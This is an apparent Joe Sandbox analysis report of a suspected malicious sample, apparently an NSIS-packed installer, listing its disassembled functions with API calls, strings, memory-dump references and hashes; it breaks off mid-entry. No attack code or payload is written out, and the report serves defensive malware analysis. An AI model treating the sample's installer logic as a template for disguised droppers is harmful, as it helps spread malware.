\Temp, xrefs: 004035AB
Error launching installer, xrefs: 0040360C
_?=, xrefs: 004035F4
~nsu.tmp, xrefs: 0040367F
C:\Users\user\Desktop, xrefs: 0040368A, 0040368F, 004036B3
"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe", xrefs: 0040348A, 0040348F, 004035E8

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"$C:\Users\user\Desktop$C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-1846598035
Opcode ID: 7a316b5055b30f9aaac34ad57f3eca8da3b8ee04e2000637dca67fb3c636fbe9
Instruction ID: 24a773ffd11e725b17f64a587af86d00896606ebd673f2b671a94fa35e787169
Opcode Fuzzy Hash: 7a316b5055b30f9aaac34ad57f3eca8da3b8ee04e2000637dca67fb3c636fbe9
Instruction Fuzzy Hash: BBA1E670500701BBD6207F629D4AB1B7E9CEB01705F10483FF985B62D2DBBD9A458BAE

Function 00405B98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00464A20,0045FE18,00406093,0045FE18), ref: 00405BA3
FindClose.KERNEL32(00000000), ref: 00405BAF

Strings

JF, xrefs: 00405B99

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: JF
API String ID: 2295610775-1378213080
Opcode ID: 8a2fef2aada0d280f7cfc8c7f2d825c9d5ff996b33c7372124f3e42565b734a1
Instruction ID: 1ee526d225bc4302f24aa9e13179370b3debcda52a21c952381bfba9845ea930
Opcode Fuzzy Hash: 8a2fef2aada0d280f7cfc8c7f2d825c9d5ff996b33c7372124f3e42565b734a1
Instruction Fuzzy Hash: 51D022301095206FC60003386D0C88B3A28EF0A3303104B32F1A5F22E0C7B4AC638A9C

Function 00405BBF Relevance: 4.5, APIs: 3, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
Instruction ID: e5a37bd0471b14276c9a44c6b696aa1abbb9d0f0bd66a2a471ce49017894d203
Opcode Fuzzy Hash: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
Instruction Fuzzy Hash: 9DE08C32600A1297DA101B609E0896B777CAB89640302C43EF545B2011DB34B825ABAD

Function 004053F8 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 227
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB

lstrcatW.KERNEL32(004DC0C0,0044FD98), ref: 0040547C
lstrlenW.KERNEL32(22571808,?,?,?,22571808,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000,00000006,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"), ref: 004054FF
lstrcmpiW.KERNEL32(?,.exe,22571808,?,?,?,22571808,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000), ref: 00405512
GetFileAttributesW.KERNEL32(22571808), ref: 0040551D
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D00A8), ref: 0040556F

Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C

RegisterClassW.USER32(00473240), ref: 004055BF
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004055D6
CreateWindowExW.USER32(00000080,?,00000000,80000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00405608

Part of subcall function 004039FC: SetWindowTextW.USER32(00000000,004732A0), ref: 00403A97

ShowWindow.USER32(00000005,00000000), ref: 0040563E
LoadLibraryW.KERNEL32(RichEd20), ref: 0040564F
LoadLibraryW.KERNEL32(RichEd32), ref: 0040565A
GetClassInfoW.USER32(00000000,RichEdit20A,00473240), ref: 00405669
GetClassInfoW.USER32(00000000,RichEdit,00473240), ref: 00405676
RegisterClassW.USER32(00473240), ref: 00405683
DialogBoxParamW.USER32(?,00000000,00404F45,00000000), ref: 004056A2

Strings

RichEd32, xrefs: 00405655
_Nb, xrefs: 00405589
.exe, xrefs: 0040550C
22571808, xrefs: 004054C3, 004054C8, 004054D9, 0040552C, 00405532
RichEdit, xrefs: 00405670
@2G, xrefs: 0040557E
.DEFAULT\Control Panel\International, xrefs: 00405467
RichEd20, xrefs: 0040564A
"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe", xrefs: 00405400
Control Panel\Desktop\ResourceLocale, xrefs: 00405440
RichEdit20A, xrefs: 00405663, 00405679

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"$.DEFAULT\Control Panel\International$.exe$22571808$@2G$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-879579094
Opcode ID: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
Instruction ID: 3004e29146ce1891a10f4484e48a0599eb6fbea5d6fbf796412b55f756561b6a
Opcode Fuzzy Hash: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
Instruction Fuzzy Hash: 7F7104B0601A11BED710ABA5AD46F6F366CEB44304F40043BF949B62E2DB794D818FAD

Function 0040311B Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040312C
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe,00002004,?,?,?,00000000,004035D7,?), ref: 00403148

Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924

GetFileSize.KERNEL32(00000000,00000000,004EC0E0,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe,C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00403194

Strings

Inst, xrefs: 00403200
C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe, xrefs: 00403137, 0040313C, 00403155, 00403175
Null, xrefs: 00403212
Error launching installer, xrefs: 0040316B
soft, xrefs: 00403209
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403359
C:\Users\user\Desktop, xrefs: 00403176, 0040317B, 00403181
"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe", xrefs: 00403125

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"$C:\Users\user\Desktop$C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-3258961464
Opcode ID: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
Instruction ID: 9295a41ff54e91ce474836f10c0d971f7d59360bd190e5c91fe05c233bc104c6
Opcode Fuzzy Hash: 689548250178369e8610e5746f9adce2578bd5dbf9f68dd3f6bd973dda8ba485
Instruction Fuzzy Hash: 4D51D771900208ABDB119FA5DD85BAE7BA8EF04716F14417FE904B62D1DB7C8E808B9D

Function 00402EE7 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F59
GetTickCount.KERNEL32 ref: 00402FFA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403023
wsprintfW.USER32 ref: 00403036
WriteFile.KERNELBASE(00000000,00000000,00424D76,004032FA,00000000), ref: 00403067
WriteFile.KERNEL32(00000000,0041E170,?,00000000,00000000,0041E170,?,000000FF,00000004,00000000,00000000,00000000), ref: 004030FF

Strings

(=C, xrefs: 00402F65
pA, xrefs: 004030E2
... %d%%, xrefs: 00403030
p!B, xrefs: 00402F13
vB, xrefs: 00402FC0, 00402FD2
vMB, xrefs: 00402FD7, 00402FF2, 0040307B
pA, xrefs: 00402FAE

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (=C$... %d%%$p!B$pA$pA$vB$vMB
API String ID: 651206458-1336809268
Opcode ID: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
Instruction ID: 169c75f2852f129af83c9b1986440f01f3d96746b5d1a97a5bed7113fa09ea58
Opcode Fuzzy Hash: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
Instruction Fuzzy Hash: 1C617B7190121AEBCF10CF65EA446AF7BB8AF44751F14413BE900B72D0D7B89A40DBA9

Function 004018D7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 00401917
CompareFileTime.KERNEL32(-00000014,?,AlgorithmPledgeSomersetLiftDlLebanon,AlgorithmPledgeSomersetLiftDlLebanon,00000000,00000000,AlgorithmPledgeSomersetLiftDlLebanon,004D40B0,00000000,00000000), ref: 00401946

Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5

Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00424D76,74DF23A0,00000000), ref: 00404AAB
Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00424D76,74DF23A0,00000000), ref: 00404ABB
Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E

Strings

AlgorithmPledgeSomersetLiftDlLebanon, xrefs: 004018F4, 004018FD, 0040190A, 0040191C, 00401932, 00401969, 0040197F, 0040199A, 004019D2, 00401A52, 00401A5B, 00401A65, 00401A70

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: AlgorithmPledgeSomersetLiftDlLebanon
API String ID: 1941528284-2256016825
Opcode ID: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
Instruction ID: b4e8f227fe7a9537edd0b9e90a91ba8e6819ca8d144e35aa4a9caf99775b3aa4
Opcode Fuzzy Hash: 4e2e2bfaca04459f9316266c88af64ec5a68e37a9f2f48202c4a4d3150a7de52
Instruction Fuzzy Hash: 6941C471A00614AADB10AB758C85EAF3668EF45329F20423BF416B11E2C77C4A91DFAD

Function 0040592D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040594B
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403392,004DC0C0,004E00C8), ref: 00405966

Strings

nsa, xrefs: 0040593A
"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe", xrefs: 00405936

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"$nsa
API String ID: 1716503409-392255881
Opcode ID: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
Instruction ID: 0cdccb08d4a0cf0f0df5d656a0a7939b265b1f1c47613fc9c1e0506998bbacb4
Opcode Fuzzy Hash: 8f9989655f15aadf8d0cc60edb10422ff76ceb60520498c0bcc2ef1eb9998b51
Instruction Fuzzy Hash: C9F06276610608EBDB109F55DE05E9B7BA9EF94720F00803BE984A7190E6B099548B58

Function 0040172D Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405807: CharNextW.USER32(?,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",0045FE18,?,00406059,0045FE18,0045FE18,le@,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",00000002,0040656C,?,004E00C8), ref: 00405815
Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000), ref: 00401757
GetLastError.KERNEL32 ref: 00401761
GetFileAttributesW.KERNELBASE(00000000), ref: 0040176F
SetCurrentDirectoryW.KERNELBASE(00000000,004D40B0,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040179F

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID:
API String ID: 3751793516-0
Opcode ID: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
Instruction ID: e2322852a9c4e47e6d687db6679f044b16e0241981b9ece66bf6cd58216f8cce
Opcode Fuzzy Hash: ec289c12e333ee4ac1693090613418d4a5d7498326967ec6e3adcff5c70bf25f
Instruction Fuzzy Hash: 3F01D631904621DBE7206B755D45B6F32A8EF14365B21063BF992F22E2D73C4C81866D

Function 0040248E Relevance: 3.0, APIs: 2, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

